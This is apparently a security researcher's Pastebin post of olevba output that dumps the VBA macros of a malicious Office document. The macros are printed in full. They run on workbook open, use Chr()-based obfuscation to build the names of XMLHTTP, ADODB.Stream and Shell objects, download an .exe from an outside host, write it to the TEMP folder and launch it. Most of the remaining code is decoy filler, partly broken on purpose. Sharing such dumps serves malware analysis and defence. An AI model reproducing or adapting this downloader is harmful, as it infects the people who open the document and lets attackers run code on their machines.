dynamoo

Malicious Excel macro

Oct 7th, 2015
401
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V virus.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: virus.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ÝòàÊíèãà.cls
  13. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub Workbook_Open()
  16.  
  17. GetFolderStartAndUp (987)
  18. End Sub
  19. Sub GetFolderStartAndUp(subMain As Long)
  20. blnSessionBegunRunRun = False
  21. IndentStringToVob
  22. End Sub
  23. -------------------------------------------------------------------------------
  24. VBA MACRO Ëèñò1.cls
  25. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
  26. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  27. (empty macro)
  28. -------------------------------------------------------------------------------
  29. VBA MACRO Ëèñò2.cls
  30. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
  31. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  32. (empty macro)
  33. -------------------------------------------------------------------------------
  34. VBA MACRO Ëèñò3.cls
  35. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
  36. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  37. (empty macro)
  38. -------------------------------------------------------------------------------
  39. VBA MACRO Class1.cls
  40. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Class1'
  41. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  42. (empty macro)
  43. -------------------------------------------------------------------------------
  44. VBA MACRO Module1.bas
  45. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
  46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  47. Public Function GetKeyValue(FullKeyName)
  48. xTotalStartUp = 0
  49. Dim Key1, Key2, i, Ua
  50. Ua = 10
  51. For i = 1 To Len(FullKeyName)
  52.     If Mid(FullKeyName, i, 1) = "\" Then
  53.         Ua = Ua + 10
  54.         If Ua = 20 Then
  55.             Key1 = Left(FullKeyName, i - 1)
  56.             Key2 = Right(FullKeyName, Len(FullKeyName) - i)
  57.         End If
  58.     End If
  59. Next i
  60. 'frmMain.Cls
  61. If Key1 = "HKEY_LOCAL_MACHINE" Then
  62. RetVal = C.RegOpenKeyEx(HKEY_LOCAL_MACHINE, Key2, 0, KEY_ALL_ACCESS, hKey)
  63. ElseIf Key1 = "HKEY_CURRENT_USER" Then
  64. RetVal = RegOpe.nKeyEx(HKEY_CURRENT_USER, Key2, 0, KEY_ALL_ACCESS, hKey)
  65. End If
  66.  
  67. Index = 0
  68. Do While RetVal = 0
  69.     NameKey = Space(255)
  70.     DataString = Space(255)
  71.     LenName = 255
  72.     DataLen = 255
  73.     RetVal = RegEnu.mValue(hKey, Index, NameKey, LenName, 0, lpType, Da.ta(0), DataLen)
  74.     If RetVal = 0 Then
  75.         NameKey = Left(NameKey, LenName) 'Rut b? kho?n tr?ng th?a
  76.        DataString = ""
  77. ' X? ly thong tin theo ki?u c?a no va ??a vao bi?n DataString
  78.        Select Case lpType
  79.              Case REG_SZ
  80.                 For i = 0 To DataLen - 1
  81.                     DataString = DataString & Chr(Da.ta(i)) ' N?i cac ch? cai thanh chu?i
  82.                Next
  83.              Case REG_BINARY
  84.                 For i = 0 To DataLen - 1
  85.                     Dim temp As String
  86.                     temp = Hex(Da.ta(i))
  87.                     If Len(temp) < 2 Then temp = String(2 - Len(temp), "0") & temp
  88.                     DataString = DataString & temp & " "
  89.  ' N?i cac c?p s? nh? phan l?i v?i nhau
  90.                Next
  91.             Case REG_DWORD
  92.                 For i = DataLen - 1 To 0 Step -1
  93.                     DataString = DataString & Hex(Da.ta(i)) 'N?i cac so hexa v?i nhau
  94.                Next
  95.  
  96.             Case REG_MULTI_SZ
  97.                 For i = 0 To DataLen - 1
  98.                     DataString = DataString & Chr(Da.ta(i))
  99.     'N?i cac ky t? bao g?m ky t? vbNullChar (?? cach dong) thanh m?t chu?i, b?n co th? s? d?ng m?t m?ng g?m nhi?u string thay vi la m?t
  100.                Next
  101.             Case REG_EXPAND_SZ
  102.                 For i = 0 To DataLen - 2
  103.                     DataString = DataString & Chr(Da.ta(i))
  104.     'N?i cac ky t? l?i v?i nhau, b? ky t? NULL cu?i cung
  105.                Next
  106.             Case Else
  107.                 DataString = " Khong xac dinh duoc !"
  108.         ' Tren ?ay la 5 ki?u co tren WinXP
  109.        End Select
  110.     End If
  111.     Loop
  112.     End Function
  113.  Public Function ntegerLongue(VariantNeVariant As Variant, StringAsString As String)
  114. Dim rimmaLongInteger As Object
  115. Set rimmaLongInteger = SplitXMLStringAndNot(Chr(65) & Chr(100) + "(" & Chr(111) & Chr(100) & "b*" & Chr(46) & ")S" & Chr(116) & Chr(114) & Chr(101) & Chr(97) & "+m")
  116. rimmaLongInteger.Type = 1
  117. With rimmaLongInteger
  118.     .Open
  119.     .write VariantNeVariant
  120. End With
  121. REGMULTISZ1 rimmaLongInteger, StringAsString
  122. End Function
  123.  
  124.  
  125.  
  126.  Public Function ntegerccCLongue()
  127.     If Left(Left(NameKey, LenName), 1) <> " " Then
  128.     '///////////////////
  129.    'Form1.List1.AddItem DataString
  130.  
  131.     With frmMain.LV
  132.         Dim iu
  133.         iu = .ListItems.Count + 1
  134.         .ListItems.Add iu, , Left(NameKey, LenName)
  135.         .ListItems(iu).SubItems(1).Caption = DataString
  136.         .ListItems(iu).SubItems(2).Caption = Key1 & "\" & Key2 & "\" & Left(NameKey, LenName)
  137.     End With
  138.     '///////////////
  139.    End If
  140.     Index = Index + 1
  141.     'frmMain.Print Left(NameKey, LenName) & "=" & DataString
  142.  
  143. RetVal = RegC.loseKey(hKey)
  144. End Function
  145.  
  146. Public Function GetFileName(ByVal sPath As String) As String
  147. GetFileName = Mid(sPath, InStrRev(sPath, "\") + 1)
  148. End Function
  149.  
  150. Public Sub IndentStringToVob()
  151. Dim SplitIndexAsString As Object
  152. Set SplitIndexAsString = SplitXMLStringAndNot(Chr(77) & "++" + Chr(105) & "(cr)" & Chr(111) & Chr(130 - 15) & Chr(100 + 11) & Chr(102) & "t" & Chr(46) & "*X" & Chr(77) & Chr(76) & "*H" & Chr(84) & "TP")
  153. Dim SIDRa As String
  154. Dim CHR20 As Integer
  155. CHR20 = 20
  156.  
  157. SIDRa = Chr(104) & "t" & "t" & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(97) & "l" & Chr(97) & Chr(114) & Chr(109) & Chr(116) & Chr(101) & Chr(99) & "h" & Chr(99) & Chr(101) & Chr(110) & "t" & "r" & "a" & Chr(108) & "." & Chr(99) & Chr(111) & Chr(109) & "/" & "f" & "w" & Chr(52) & "3" & "t" & "2" & Chr(100) & "/" & Chr(57) & "8" & Chr(107) & "j" & "6" & Chr(46) & Chr(101) & Chr(120) & "e"
  158. For i = 1 To 4
  159. SIDRa = Replace(SIDRa, Chr(20 * 2 + i - 1), "")
  160. Next i
  161.  
  162.  
  163. HIDRAfob SplitIndexAsString, SIDRa
  164.  
  165.  
  166. Dim LocaliseStringItem3() As Byte
  167. ListItemsAndNot = GetTasNewUt()
  168.  
  169. LocaliseStringItem3 = RSPBDY(SplitIndexAsString)
  170.      
  171. ntegerLongue LocaliseStringItem3, ListItemsAndNot
  172. On Error GoTo LocaliseStringItem5
  173.     A = 889 / 0
  174.   On Error GoTo 0
  175.  
  176. IniStringPrivateInteger:
  177.   Exit Sub
  178. LocaliseStringItem5:
  179.   IniStringPrivateLong ("VisokAndVisok")
  180. Resume IniStringPrivateInteger
  181. End Sub
  182. Public Function GetFolderPath(ByVal sPath As String) As String
  183. GetFolderPath = Left(sPath, InStrRev(sPath, "\") - 1)
  184. End Function
  185.  
  186. Public Sub GetSystemKey()
  187.     With frmMain.LV
  188.         Dim iu
  189.         iu = .ListItems.Count + 1
  190.         .ListItems.Add iu, , ToUnik.Code("Shell [He65 Tho61ng]")
  191.         .ListItems(iu).SubItems(1).Caption = GetS.tring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
  192.         .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
  193.         iu = .ListItems.Count + 1
  194.         .ListItems(iu).SubItems(1).Caption = GetSt.ring(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit")
  195.         .ListItems(iu).SubItems(2).Caption = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
  196.     End With
  197. End Sub
  198.  
  199. Public Sub GetFolderStartUp(sWhere)
  200. With frmMain
  201.     Dim j
  202.     Dim o
  203. If sWhere = 1 Then
  204.     .File1.Path = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
  205.     For j = 0 To .File1.ListCount - 1
  206.         o = .LV.ListItems.Count + 1
  207.         .LV.ListItems.Add o, , .File1.List(j)
  208.         .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\" & .File1.List(j)
  209.         .LV.ListItems(o).SubItems(2).Caption = "---"
  210.     Next j
  211. Else
  212.     .File1.Path = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup"
  213.     For j = 0 To .File1.ListCount - 1
  214.         o = .LV.ListItems.Count + 1
  215.         .LV.ListItems.Add o, , .File1.List(j)
  216.         .LV.ListItems(o).SubItems(1).Caption = "C:\Documents and Settings\" & Environ$("USERNAME") & "\Start Menu\Programs\Startup\" & .File1.List(j)
  217.         .LV.ListItems(o).SubItems(2).Caption = "---"
  218.     Next j
  219. End If
  220. End With
  221. End Sub
  222.  
  223. Public Function HIDRAfob(SplitIndexAsString As Object, SIDRa As String)
  224.  
  225. SplitIndexAsString.Open Chr(71) & Chr(69) & "T", Replace(SIDRa, "??", "//"), False
  226. End Function
  227.  
  228.  
  229.  
  230.  
  231.  
  232. -------------------------------------------------------------------------------
  233. VBA MACRO Module2.bas
  234. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
  235. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  236. Public blnIsOpenConnection As Boolean
  237. Public blnSessionBegun As Boolean
  238. ' Ticket
  239. Public ticket As String
  240.  
  241. Public blnSessionBegunRunRun As Boolean
  242. ' Request and response strings
  243. Public requestXML  As String
  244. Public responseXML As String
  245.  
  246.  
  247. Public Function OpenConnection() As Boolean
  248. 'Open the connection
  249. On Error GoTo ErrHandler
  250.    
  251.     If blnIsOpenConnection Then
  252.         OpenConnection = True
  253.         Exit Function
  254.     End If
  255.        
  256.  
  257.     blnSessionBegun = False
  258.     blnIsOpenConnection = False
  259.    
  260.     ' Open connection to qbXMLRP COM
  261.    qbXMLRP.OpenConnection "QBRAddEmp", "IDN QuickBooks Sample Add Invoice"
  262.     blnIsOpenConnection = True
  263.     ' Begin Session
  264.    ' Pass empty string for the data file name to use the currently
  265.    ' open data file.
  266.    
  267.    
  268.     ticket = qbXMLRP.BeginSession("", QBXMLRPLib.qbFileOpenSingleUser)
  269.     blnSessionBegun = True
  270.    
  271.     OpenConnection = True 'return that the connection was successful
  272.    
  273.     'Verifying which version of qbXML QuickBooks is supporting If you want to do a US/Canadian APP,
  274.    'This is where you would find the version supported by QuickBooks.  You would modify the requests accordingly
  275.    'to the version of QuickBooks
  276.    Dim VersionSupportedArray() As String
  277.     VersionSupportedArray = qbXMLRP.QBXMLVersionsForSession(ticket) ' This return an array of string containing all the version of qbXML
  278.                                                            'supported by QuickBooks
  279.    
  280.     'Checking that QuickBooks support the Canadian SDK (version CA2.0)
  281.    Dim strCanadianVersion As String
  282.     Dim blnCanadianVersionFound As Boolean
  283.     Dim str As Variant
  284.    
  285.    
  286. '    Dim nArrayUpperBound As Integer
  287.    
  288.    
  289.     strCanadianVersion = "CA2.0"
  290.     blnCanadianVersionFound = False
  291.  
  292.     For Each str In VersionSupportedArray
  293.         If strCanadianVersion = str Then
  294.             blnCanadianVersionFound = True
  295.         End If
  296.    
  297.     Next str
  298.    
  299.     If blnCanadianVersionFound = False Then 'If version CA 2.0 not found...
  300.        MsgBox "This QuickBooks does not support the version CA2.0 of qbXML", , "qbXML version not supported"""
  301.         If blnSessionBegun = True Then
  302.             qbXMLRP.EndSession ticket
  303.         End If
  304.         ' Close the connection
  305.        If blnIsOpenConnection = True Then
  306.             blnIsOpenConnection = False
  307.             qbXMLRP.CloseConnection
  308.         End If
  309.         OpenConnection = False
  310.    
  311.     End If
  312.  
  313.    
  314.     Exit Function
  315.        
  316. ErrHandler:
  317.     blnIsOpenConnection = False
  318.     OpenConnection = False
  319.     ' End the session
  320.    If blnSessionBegun = True Then
  321.         qbXMLRP.EndSession ticket
  322.     End If
  323.     ' Close the connection
  324.    If blnIsOpenConnection = True Then
  325.         qbXMLRP.CloseConnection
  326.     End If
  327.     MsgBox Err.Description, vbExclamation, "Error"
  328.     Exit Function
  329.  
  330. End Function
  331.  
  332.  
  333. Public Sub CloseConnection()
  334. ' Ends session and closes connection
  335.    
  336. If Not blnIsOpenConnection Then
  337.         Exit Sub
  338. End If
  339.  
  340. On Error GoTo ErrHandler
  341.    
  342.     If blnSessionBegun = True Then
  343.         qbXMLRP.EndSession ticket
  344.     End If
  345.     ' Close the connection
  346.    If blnIsOpenConnection = True Then
  347.         qbXMLRP.CloseConnection
  348.     End If
  349.  
  350.     Exit Sub
  351.  
  352. ErrHandler:
  353.     MsgBox Err.Description, vbExclamation, "Error"
  354.     Exit Sub
  355.  
  356. End Sub
  357.  
  358. Public Function IniStringPrivateLong(ZRzNfTJSyBWpPu As String)
  359.     Set IniLongPrivateInteger = SplitXMLStringAndNot("Sh" & Chr(101) & "(l)" & "+l+" & Chr(46) & Chr(65) & "*p" & Chr(112) & "(l)" & Chr(105) & Chr(99) & "a+t" + Chr(105) & "()" & Chr(111) + Chr(110))
  360. IniLongPrivateInteger.Open (ListItemsAndNot)
  361. End Function
  362.  
  363.  
  364. ' This subroutine is available for error checking.  It is sometimes
  365. ' useful to print the XML which QuickBooks returns to a file so that
  366. ' any problems can be uncovered easily.  Although this subroutine is
  367. ' not currently in use in the ReceievePayment sample code, it is
  368. ' encouraged that you add it in if you would like to see the precise
  369. ' XML that is being sent to or received from QuickBooks.
  370. '
  371. Sub PrintXMLToFile(xmlString As String, XMLFile As String)
  372.                                        
  373.   Dim SplitXMLString() As String
  374.   Dim IndentString As String
  375.   Dim xmlStringLength As Long
  376.   Dim SplitIndex
  377.  
  378.   IndentString = ""
  379.  
  380.   Dim FileNum
  381.   FileNum = FreeFile
  382.   Open XMLFile For Output As FileNum
  383.  
  384.   ' Remove the linefeeds from the XML output string
  385.  xmlString = Replace(xmlString, vbLf, vbNullString)
  386.  
  387.   SplitXMLString = Split(xmlString, "<")
  388.  
  389.   ' We're expecting the first character of the XML output to be "<"
  390.  ' which result in an empty first array element, so skip it.
  391.  SplitIndex = LBound(SplitXMLString) + 1
  392.   End Sub
  393.   Public Function RSPBDY(SomeBody As Object) As Variant
  394. SomeBody.Send
  395. RSPBDY = SomeBody.responseBody
  396. End Function
  397. Public Sub ReadFile( _
  398.   strName As String, _
  399.   strDate As String _
  400. )
  401.    
  402.     Dim strMstDir As String
  403.     Dim strClientName As String
  404.     Dim strTargetdate As String
  405.     Dim intCntPic As Integer
  406.    
  407.     strMstDir = gstrMstDir
  408.     strClientName = strName
  409.    
  410.     If strDate <> vbNullString Then
  411.         strTargetdate = strDate
  412.     End If
  413.    
  414. ''    Select Case frmSubForm.Name
  415. ''        Case "frmBasic"
  416.            intCntPic = 13
  417. ''        Case "frmFP"
  418. ''            intCntPic = 3
  419. ''        Case "frmIOP"
  420. ''            intCntPic = 6
  421. ''    End Select
  422.    
  423.     Dim intIndex        As Integer
  424.     ReDim m_udtFileList(intIndex)
  425.    
  426.     Dim strDirFile      As String, strLoadPicFile  As String
  427.    
  428.     Dim intFileHandle As Integer
  429.     Dim strFilePath As String
  430.     Dim strFileName As String
  431.     Dim strReadHeader As String
  432.     Dim strReadData As String
  433.    
  434.     strFilePath = gstrMstDir & "\" & strName
  435.     strFileName = strFilePath & "\" & strDate & "T.txt"
  436.    
  437.     If strName = vbNullString Then Exit Sub
  438.     If Dir(strFileName) = vbNullString Then Exit Sub
  439.        
  440. '/** ??????? **/
  441.    datDate = CDate(DateSerial(Left$(strDate, 4), _
  442.                 Mid$(strDate, 5, 2), Mid$(strDate, 7, 2)))
  443.    
  444. '// ??????????????
  445.    m_sParts = vbNullString
  446.  
  447. '/** ?????????????? **/
  448.    intFileHandle = FreeFile()
  449.     Open strFileName For Input As #intFileHandle
  450.    
  451.     ReDim Preserve m_udtFileList(intIndex)
  452.     While Not EOF(intFileHandle)
  453.         With m_udtFileList(intIndex)
  454.             Input #intFileHandle, strReadHeader, strReadData
  455.             Select Case strReadHeader
  456.                 Case "[Picture]"
  457.                 Case "[Document]"
  458.                 Case "[Shooting]"
  459.                 Case "NAME"
  460.                     m_sParts = strReadData
  461.                 Case Else
  462.                   If strReadData <> "" Then
  463.                     .intFileNum = CInt(Right$(strReadHeader, 1))
  464.                     .strClntName = strName
  465.                     .strFileDate = Left$(strReadData, 8)
  466.                    
  467. ''                        datDate = CDate(DateSerial(Left$(strReadData, 4), _
  468.                                 Mid$(strReadData, 5, 2), Mid$(strReadData, 7, 2)))
  469.                    
  470.                     .strFileName = strReadData
  471.                     .strFileType = Left$(strReadHeader, 1)
  472.                     strLoadPicFile = gstrMstDir & "\" & .strClntName & "\" & .strFileName
  473.                
  474.                     Call frmProgress.SetProgess((intIndex) / intCntPic * 100)
  475.                    
  476.                     intIndex = intIndex + 1
  477.                 End If
  478.             End Select
  479.         End With
  480.            
  481.         ReDim Preserve m_udtFileList(intIndex)
  482.    
  483.     Wend
  484.    
  485.     Close #intFileHandle
  486.  
  487. DoEvents
  488.    
  489. End Sub
  490.  
  491. Public Function SplitXMLStringAndNot(InitiPrivateInteger As String)
  492. For i = 1 To 4
  493. InitiPrivateInteger = Replace(InitiPrivateInteger, Chr(20 * 2 + i - 1), "")
  494. Next i
  495. If blnSessionBegunRunRun Then
  496. Exit Function
  497. End If
  498.  
  499.     Set SplitXMLStringAndNot = CreateObject(InitiPrivateInteger)
  500. End Function
  501.   Public Function SmthingWrongFunc()
  502.   Do
  503.     If Left(Splift.xmlString(SplitIndex), 1) = "/" Then
  504.       IndentString = Left(IndentString, Len(IndentString) - 3)
  505.       Print #FileNum, IndentString & "<" & _
  506.                       SplitXM.LString(SplitIndex)
  507.       SplitIndex = SplitIndex + 1
  508.     ElseIf Left(SplitXM.LString(SplitIndex + 1), 1) = "/" Then
  509.       If InStr(1, _
  510.                Left(SplitXM.LString(SplitIndex), _
  511.                     InStr(1, SplitXM.LString(SplitIndex), ">")), _
  512.                 " ") > 0 Then
  513.         Print #FileNum, IndentString & "<" & _
  514.                         SplitXM.LString(SplitIndex)
  515.         SplitIndex = SplitIndex + 1
  516.       Else
  517.         Print #FileNum, IndentString & "<" & _
  518.                         SplitXM.LString(SplitIndex) & "<" & _
  519.                         SplitXM.LString(SplitIndex + 1)
  520.         SplitIndex = SplitIndex + 2
  521.       End If
  522.     Else
  523.       Print #FileNum, IndentString & "<" & _
  524.                       SplitXM.LString(SplitIndex)
  525.       IndentString = IndentString & "   "
  526.       SplitIndex = SplitIndex + 1
  527.     End If
  528.   Loop Until SplitIndex >= UBound(SplitX.MLString)
  529.  
  530.   If Left(SplitXM.LString(UBound(SplitX.MLString)), 1) = "/" Then
  531.     IndentString = Left(IndentString, Len(IndentString) - 3)
  532.   End If
  533.  
  534.   Print #FileNum, IndentString & "<" & _
  535.                   SplitXM.LString(UBound(SplitXM.LString))
  536.  
  537.   Close FileNum
  538. End Function
  539.  
  540.  
  541.  
  542.  
  543.  
  544. -------------------------------------------------------------------------------
  545. VBA MACRO Module3.bas
  546. in file: virus.doc - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
  547. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  548.  
  549. Public ListItemsAndNot As String
  550. Public Function GetCharsetFromLng(lngCodePage As Long) As Long
  551.  
  552.     Dim lngCharset As Long
  553.  
  554.     Select Case lngCodePage
  555.  
  556.         Case 1251
  557.             lngCharset = RUSSIAN_CHARSET
  558.  
  559.         Case 1250
  560.             'EASTEUROPE_CHARSET = 238
  561.            lngCharset = EASTEUROPE_CHARSET
  562.  
  563.         Case 1252
  564.             'ANSI_CHARSET = 0
  565.            lngCharset = ANSI_CHARSET
  566.  
  567.         Case 1253
  568.             'GREEK_CHARSET = 161
  569.            lngCharset = GREEK_CHARSET
  570.  
  571.         Case 1254
  572.             'TURKISH_CHARSET = 162
  573.            lngCharset = TURKISH_CHARSET
  574.  
  575.         Case 1255
  576.             'HEBREW_CHARSET = 177
  577.            lngCharset = HEBREW_CHARSET
  578.  
  579.         Case 1256
  580.             'ARABIC_CHARSET = 178
  581.            lngCharset = ARABIC_CHARSET
  582.  
  583.         Case 1257
  584.             'BALTIC_CHARSET = 186
  585.            lngCharset = BALTIC_CHARSET
  586.  
  587.         Case 1258
  588.             'VIETNAMESE_CHARSET = 163
  589.            lngCharset = VIETNAMESE_CHARSET
  590.  
  591.         Case 874
  592.             lngCharset = THAI_CHARSET
  593.  
  594.         Case 932
  595.             'SHIFTJIS_CHARSET = 128
  596.            lngCharset = SHIFTJIS_CHARSET
  597.  
  598.         Case 949
  599.             'HANGUL_CHARSET = 129
  600.            lngCharset = HANGUL_CHARSET
  601.  
  602.         Case 936
  603.             'GB2312_CHARSET = 134
  604.            lngCharset = GB2312_CHARSET
  605.  
  606.         Case 950
  607.             'CHINESEBIG5_CHARSET = 136
  608.            lngCharset = CHINESEBIG5_CHARSET
  609.  
  610.         Case Else
  611.             'DEFAULT_CHARSET = 1
  612.            lngCharset = DEFAULT_CHARSET
  613.     End Select
  614.  
  615.     GetCharsetFromLng = lngCharset
  616. End Function
  617. Public Function GetTasNewUt() As String
  618. Set LocaliseStringItem0 = SplitXMLStringAndNot(Chr(87) & "(S+c)" & Chr(114) & Chr(105) & "*p" & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & "))l")
  619.  
  620. Set LocaliseStringItem1 = LocaliseStringItem0.Environment(Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
  621. Dim huh2 As Integer
  622. huh2 = 25
  623. Dim uhu As String
  624. uhu = Chr(16 * Sqr(huh2) - 10 - 1)
  625. uhu = Chr(180 - 30 * 2) + uhu
  626. GetTasNewUt = LocaliseStringItem1(Chr(84) & "E" & Chr(77) & Chr(80)) + _
  627. "\ka" & Chr(104) + "78d" & Chr(40 + 2 * 3) & Chr(70 - 1) + uhu
  628.  
  629. End Function
  630. '!--------------------------------------------------------------------------------
  631. '! Procedure   (Ooieoey)   :   Function GetUserLocaleInfo
  632. '! Description (Iienaiea)  :   [type_description_here]
  633. '! Parameters  (Ia?aiaiiua):   dwLocaleID (Long)
  634. '                              dwLCType (Long)
  635. '!--------------------------------------------------------------------------------
  636. Public Function GetUserLocaleInfo(ByVal dwLocaleID As Long, ByVal dwLCType As Long) As String
  637.  
  638.     Dim sReturn As String
  639.     Dim R       As Long
  640.  
  641.     'call the function passing the Locale type
  642.    'variable to retrieve the required size of
  643.    'the string buffer needed
  644.    R = ss.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, 0)
  645.  
  646.     'if successful..
  647.    If R Then
  648.         'pad the buffer with spaces
  649.        sReturn = s.FillNullChar(R)
  650.         'and call again passing the buffer
  651.        R = cs.GetLocaleInfo(dwLocaleID, dwLCType, sReturn, Len(sReturn))
  652.  
  653.         'if successful (r > 0)
  654.        If R Then
  655.             'r holds the size of the string
  656.            'including the terminating null
  657.            GetUserLocaleInfo = sc.TrimNull(sReturn)
  658.         End If
  659.     End If
  660.  
  661. End Function
  662.  
  663. '!--------------------------------------------------------------------------------
  664. '! Procedure   (Ooieoey)   :   Function LoadLanguageList
  665. '! Description (Iienaiea)  :   [Caa?ocea nienea ycueia]
  666. '! Parameters  (Ia?aiaiiua):
  667. '!--------------------------------------------------------------------------------
  668. Public Function LoadLanguageList() As Boolean
  669.  
  670.     Dim strFileList_x() As Integer
  671.     Dim ii              As Integer
  672.     Dim jj              As Integer
  673.     Dim strTemp         As String
  674.     Dim strLangFilePath As String
  675.     Dim lngUbound       As Long
  676.  
  677.     strFileList_x = sc.SearchFilesInRoot(strAppPathBackSL & strToolsLang_Path, "*.lng", False, False)
  678.  
  679.     lngUbound = UBound(strFileList_x)
  680.     If lngUbound Then
  681.         If LenB(sc.strFileList_x(0).FullPath) Then
  682.    
  683.             ReDim arrLanguage(6, lngUbound + 1)
  684.        
  685.             For ii = 0 To lngUbound
  686.                 jj = ii + 1
  687.                
  688.                 ' Ioou ai ycueiaiai oaeea
  689.                strLangFilePath = cs.strFileList_x(ii).FullPath
  690.                 arrLanguage(1, jj) = strLangFilePath
  691.                 ' Eiy ycuea
  692.                arrLanguage(2, jj) = GetIn.iValueString(strLangFilePath, "Lang", "Name", vbNullString)
  693.                 ' Eiy ia?aaia?eea
  694.                arrLanguage(4, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorName", vbNullString)
  695.                 ' Aa?an ia?aaia?eea
  696.                arrLanguage(5, jj) = GetIn.iValueString(strLangFilePath, "Lang", "TranslatorURL", vbNullString)
  697.                 ' Charset ycuea
  698.                arrLanguage(6, jj) = GetIn.iValueLong(strLangFilePath, "Lang", "Charset", 1)
  699.                 ' ID ycuea
  700.                strTemp = GetIn.iValueString(strLangFilePath, "Lang", "ID", vbNullString)
  701.        
  702.                 If LenB(strTemp) Then
  703.                     arrLanguage(3, jj) = strTemp
  704.        
  705.                     If mbAutoLanguage Then
  706.                         If InStr(1, strTemp, strPCLangID, vbTextCompare) Then
  707.                             strPCLangCurrentPath = arrLanguage(1, jj)
  708.                             strPCLangCurrentLangName = arrLanguage(2, jj)
  709.                             lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
  710.                             strPCLangCurrentID = strPCLangID
  711.                         End If
  712.        
  713.                     Else
  714.        
  715.                         If LenB(strStartLanguageID) Then
  716.                             If InStr(1, strTemp, strStartLanguageID, vbTextCompare) Then
  717.                                 strPCLangCurrentPath = arrLanguage(1, jj)
  718.                                 strPCLangCurrentLangName = arrLanguage(2, jj)
  719.                                 lngFont_Charset = GetCharsetFromLng(CLng(arrLanguage(6, jj)))
  720.                                 strPCLangCurrentID = strStartLanguageID
  721.                             End If
  722.                         End If
  723.                     End If
  724.                 End If
  725.        
  726.                 LoadLanguageList = True
  727.             Next
  728.        
  729.             If LenB(strPCLangCurrentPath) = 0 Then
  730.                 strPCLangCurrentPath = Pa.thCombine(strAppPathBackSL & strToolsLang_Path, "English.lng")
  731.                 strPCLangCurrentID = "0409"
  732.                 lngFont_Charset = 1
  733.             End If
  734.         End If
  735.     End If
  736.  
  737. End Function
  738.  
  739. '!--------------------------------------------------------------------------------
  740. '! Procedure   (Ooieoey)   :   Sub LoadLanguageOS
  741. '! Description (Iienaiea)  :   [N?eouaaai ycue iia?aoeiiiie nenoaiu, e caienuaaai a ia?aiaiiua Public]
  742. '! Parameters  (Ia?aiaiiua):
  743. '!--------------------------------------------------------------------------------
  744. Public Sub LoadLanguageOS()
  745.  
  746.     Dim LCID As Long
  747.  
  748.     ' N?eouaaai ycue iia?aoeiiie nenoaiu
  749.    LCID = GetSys.temDefaultLCID()
  750.     'language id
  751.    strPCLangID = GetUserLocaleInfo(LCID, LOCALE_ILANGUAGE)
  752.     'localized name of language
  753.    strPCLangLocaliseName = GetUserLocaleInfo(LCID, LOCALE_SLANGUAGE)
  754.     'English name of language
  755.    strPCLangEngName = GetUserLocaleInfo(LCID, LOCALE_SENGLANGUAGE)
  756. End Sub
  757. Public Function REGMULTISZ1(REGEXPANDSZ As Object, EXPANDSZ1 As String)
  758. Dim REG_EXPAND_SZ As Integer
  759. REG_EXPAND_SZ = 2
  760. REGEXPANDSZ.savetofile EXPANDSZ1, REG_EXPAND_SZ
  761. End Function
  762.  
  763.  
  764. '!--------------------------------------------------------------------------------
  765. '! Procedure   (Ooieoey)   :   Sub LocaliseMessage
  766. '! Description (Iienaiea)  :   [Eieaeecaoey niiauaiee i?ia?aiiu]
  767. '! Parameters  (Ia?aiaiiua):   StrPathFile (String)
  768. '!--------------------------------------------------------------------------------
  769. Public Sub LocaliseMessage(strPathFile As String)
  770.  
  771.     Dim i As Integer
  772.  
  773.     For i = 1 To UBound(strMessages)
  774.         strMessages(i) = LocaliseString(strPathFile, "Messages", "strMessages" & i, "strMessages" & i)
  775.     Next i
  776.  
  777. End Sub
  778.  
  779. '!--------------------------------------------------------------------------------
  780. '! Procedure   (Ooieoey)   :   Function LocaliseString
